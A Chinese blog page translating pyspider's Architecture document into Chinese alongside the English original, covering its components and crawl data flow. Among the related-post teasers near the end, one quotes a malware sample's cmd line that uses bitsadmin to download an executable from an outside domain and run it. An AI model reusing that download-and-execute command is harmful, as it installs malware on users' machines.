文档章节

pyspider爬虫学习-文档翻译-Architecture.md

sijinge
 sijinge
发布于 2017/08/31 23:02
字数 2002
阅读 28
收藏 1
Architecture 体系结构
============
此文档描述我创造pyspider的原因和pyspider的体系结构
This document describes the reason why I made pyspider and the architecture.

Why 为什么?
---
两年前,我还在一家垂直搜索引擎,我们面临以下爬行需求
Two years ago, I was working on a vertical search engine. We are facing following needs on crawling:
收集100-200个网站,他们可能在线/离线或随时更换自己的模板
1. collect 100-200 websites, they may on/offline or change their templates at any time
我们需要一个正真强大的监控工具来发现哪个网站正在变化,而且它是一个帮助我们为每个网站编写脚本/模板的好工具
> We need a really powerful monitor to find out which website is changing. And a good tool to help us write script/template for each website.
需要在网站更新5分钟内收集到数据
2. data should be collected in 5min when website updated
我们经常通过检查索引页来解决这个问题,并使用“最后更新时间”或“最后回复时间”来确定哪个页面被更改了。此外,我们在x天后从新检查页防止遗漏
> We solve this problem by check index page frequently, and use something like 'last update time' or 'last reply time' to determine which page is changed. In addition to this, we recheck pages after X days in case to prevent the omission.  
只要www不断变化,pyspider永不停止
> **pyspider will never stop as WWW is changing all the time**
此外,我们有一些从我们的合作伙伴的API,API可能需要POST,proxy,request签名等。从脚本完全控制比组件的某些全局参数更为方便。
Furthermore, we have some APIs from our cooperators, the API may need POST, proxy, request signature etc. Full control from script is more convenient than some global parameters of components.

Overview 概述
--------
下面的图表展示和概述了pyspider的体系结构以及它的组件和概述数据流在系统中的实现
The following diagram shows an overview of the pyspider architecture with its components and an outline of the data flow that takes place inside the system.

![pyspider](imgs/pyspider-arch.png)
组件由消息队列连接。每个组件,包括消息队列,都在自己的进程/线程中运行,并可替换。这意味着,当进程缓慢时,您可以拥有许多处理器实例并充分利用多个cpu,或者部署到多台机器上。这种架构让pyspider变得非常快。
Components are connected by message queue. Every component, including message queue, is running in their own process/thread, and replaceable. That means, when process is slow, you can have many instances of processor and make full use of multiple CPUs, or deploy to multiple machines. This architecture makes pyspider really fast. [benchmarking](https://gist.github.com/binux/67b276c51e988f8e2c31#comment-1339242).

Components 组件
----------

### Scheduler 调度器
调度器接收来自处理器的newtask_queue的任务。决定任务是新的还是需要重新爬行。根据优先级排序任务,并将其喂给具有流量控制的fetcher
The Scheduler receives tasks from newtask_queue from processor. Decide whether the task is new or requires re-crawl. Sort tasks according to priority and feeding them to fetcher with traffic control ([token bucket](http://en.wikipedia.org/wiki/Token_bucket) algorithm). Take care of periodic tasks, lost tasks and failed tasks and retry later.
以上的一切都可以通过“self.crawl”[API](apis/)来设定
All of above can be set via `self.crawl` [API](apis/). 

注意,当前的调度器的实现中,只允许使用一个调度器
Note that in current implement of scheduler, only one scheduler is allowed.

### Fetcher 提取者
Fetcher负责抓取web页面,然后将结果发送给处理器。非常灵活,支持通过URL以及javascript 动态抓取,可以通过api控制抓取method、head、cookie、proxy、etag等
The Fetcher is responsible for fetching web pages then send results to processor. For flexible, fetcher support [Data URI](http://en.wikipedia.org/wiki/Data_URI_scheme) and pages that rendered by JavaScript (via [phantomjs](http://phantomjs.org/)). Fetch method, headers, cookies, proxy, etag etc can be controlled by script via [API](apis/self.crawl/#fetch).

### Phantomjs Fetcher 
Phantomjs Fetcher像代理一样工作。它连接到一般的Fetcher,以JavaScript的方式获取和呈现页面,输出一个通用的HTML到Fetcher
Phantomjs Fetcher works like a proxy. It's connected to general Fetcher, fetch and render pages with JavaScript enabled, output a general HTML back to Fetcher:

```
scheduler -> fetcher -> processor
                |
            phantomjs
                |
             internet
```

### Processor 处理器
处理器负责运行用户编写的脚本以解析和提取信息。您的脚本运行在任何环境中。并且我们有各种工具(如[PyQuery](https://pythonhosted.org/pyquery/))以便提取信息和链接,你可以使用任何你想要处理的响应。您可以参考[Script-Environment](Script-Environment)和[API引用](API /)来获取更多关于脚本的信息。
The Processor is responsible for running the script written by users to parse and extract information. Your script is running in an unlimited environment. Although we have various tools(like [PyQuery](https://pythonhosted.org/pyquery/)) for you to extract information and links, you can use anything you want to deal with the response. You may refer to [Script Environment](Script-Environment) and [API Reference](apis/) to get more information about script.
理器将捕获异常和日志,发送状态(任务跟踪)和新任务到“调度器”,将结果发送给“结果工作者”。
Processor will capture the exceptions and logs, send status(task track) and new tasks to `scheduler`, send results to `Result Worker`.

### Result Worker (optional) 结果工作者(可选)
结果工作者接收`Processor`的处理结果,Pyspider有一个内置的结果工作者,可以将结果保存为“resultdb”,重写它以满足你的需要。
Result worker receives results from `Processor`. Pyspider has a built-in result worker to save result to `resultdb`. Overwrite it to deal with result by your needs.

### WebUI
WebUI是一个web前端。它包含
WebUI is a web frontend for everything. It contains:

* script editor, debugger 脚本编辑、调试
* project manager 项目管理
* task monitor 任务监控
* result viewer, exporter 结果展示,输出
也许webui是pyspider最吸引人的部分。有了这个强大的UI,您就可以像pyspider一样一步一步地调试脚本。启动或停止一个项目。发现哪个项目出错了,什么请求失败了,再用调试器再次尝试。
Maybe webui is the most attractive part of pyspider. With this powerful UI, you can debug your scripts step by step just as pyspider do. Starting or stop a project. Finding which project is going wrong and what request is failed and try it again with debugger.

Data flow 数据流
---------
pyspider中的数据流正如上面图中所示
The data flow in pyspider is just as your seen in diagram above:
每个脚本都有一个名为“on_start”的回调,当您按下WebUI上的“Run”按钮时。“on_start”的新任务被提交给调度程序作为项目的条目
1. Each script has a callback named `on_start`, when you press the `Run` button on WebUI. A new task of `on_start` is submitted to Scheduler as the entries of project.
调度程序将这个' on_start '任务与一个数据URI作为一个正常的任务给Fetcher。
2. Scheduler dispatches this `on_start` task with a Data URI as a normal task to Fetcher.
etcher提出请求并响应它(对于数据URI来说,这是一个虚假的请求和响应,但与其他正常任务没有区别),然后feed到处理器。
3. Fetcher makes a request and a response to it (for Data URI, it's a fake request and response, but has no difference with other normal tasks), then feeds to Processor.
处理器调用“on_start”方法,生成一些新的URL抓取。处理器将消息发送给调度程序,将任务完成并通过消息队列将新任务发送给调度程序(在大多数情况下,这里没有“on_start”的结果)。如果有结果,处理器将它们发送到“result_queue”)。
4. Processor calls the `on_start` method and generated some new URL to crawl. Processor send a message to Scheduler that this task is finished and new tasks via message queue to Scheduler (here is no results for `on_start` in most case. If has results, Processor send them to `result_queue`).
调度器接收新的任务,在数据库中查找,确定任务是新的还是需要重新爬行的,确定后,将它们放到任务队列中。按排序分派任务。
5. Scheduler receives the new tasks, looking up in the database, determine whether the task is new or requires re-crawl, if so, put them into task queue. Dispatch tasks in order.
这个过程重复(从第3步开始),直到WWW死了,才停止。调度器将检查周期性的任务来抓取最新的数据。
6. The process repeats (from step 3) and wouldn't stop till WWW is dead ;-). Scheduler will check periodic tasks to crawl latest data.

© 著作权归作者所有

共有 人打赏支持
sijinge
粉丝 0
博文 41
码字总数 37230
作品 0
广州
架构师
使用pyspider抓取起点中文网小说数据

简介 pyspider是国人开发的相当好用的爬虫框架。虽然网上教程不是很多,但是文档详细,操作简单,非常适合用来做爬虫练习或者实现一些抓取数据的需求。 本文就以抓取起点中文小说网的小说作品...

某杰
2017/02/22
0
0
手把手教你写网络爬虫(3):开源爬虫框架对比

原文出处:拓海 介绍 大家好!我们从今天开始学习开源爬虫框架Scrapy,如果你看过《手把手》系列的前两篇,那么今天的内容就非常容易理解了。细心的读者也许会有疑问,为什么不学出身名门的A...

拓海
04/28
0
0
pyspider + RabbitMQ 使用记 - 上

接到一个爬虫任务,项目比较巨大,原来想用 Requests 配合正则做爬虫。后来得知了 pyspider 这个神器,才知道之前的想法 low 爆了。pyspider GitHub 按照 GitHub 上的安装教程安装好以后,我...

xh4n3
2015/08/04
0
0
用PySpider搜集2017年高校招生章程

个人认为PySpider是一个十分容易上手而且功能强大的Python爬虫框架。支持多线程爬取、JS动态解析、出错重试、定时爬取等等的功能。最重要的是,它通过web提供了可操作界面,使用非常人性化。...

临江仙卜算子
05/15
0
0
Centos7-Pyspider单机版安装

安装的centos版本:CentOS-7-x86_64-DVD-1804.iso 安装的python版本:Python3.6.2 系统为最干净的系统,只安装了一个界面,界面不安装也可以 centos7自带版本为: [root@localhost ~]# pyth...

dong66
07/13
0
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

java并发api总结

1.java.util.concurrent包 1.1 Executors Executor:接口,仅有一个方法为execute(Runnable) ExecutorService:Executor的子接口,扩展了Executor的方法,如submit/shutdown等。 Executors:......

Funcy1122
16分钟前
0
0
cmd bat 下载并运行文件,来自cve-11882漏洞样本,eqnedit32.exe栈溢出

cmd.exe /c bitsadmin /transfer eH /priority foreground http://holdthatpaper33.com/abu_output774B940.exe %USERPROFILE%\cXUAQSZZXXCXzx.exe && start %USERPROFILE%\cXUAQSZZXXCXzx.ex......

simpower
29分钟前
1
0
Java 面向对象 之 对象数组

http://www.verejava.com/?id=16992784958543 /** 知识点: 对象数组 1. 对象数组的使用 2. 对象数组的foreach 增强for循环 3. 可变参数 题目:乘客...

全部原谅
31分钟前
0
0
超越时间和空间,带你到n维去!

我们处理三维问题十分自如,必要时对付四维问题也凑合。我们不费吹灰之力就能接受有实体和无限空间的三维世界。加上第四维时间后情况就有点复杂了。 但当我们开始研究包括再多或再少维数的世...

WeiXiaodong
42分钟前
0
0
通过ip获取真实地址

package util;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.JSONObject;import org.apache.commons.lang3.StringUtils;import org.apache.http.HttpResponse;......

lifes77
今天
3
0

没有更多内容

加载失败,请刷新页面

加载更多

下一页

返回顶部
顶部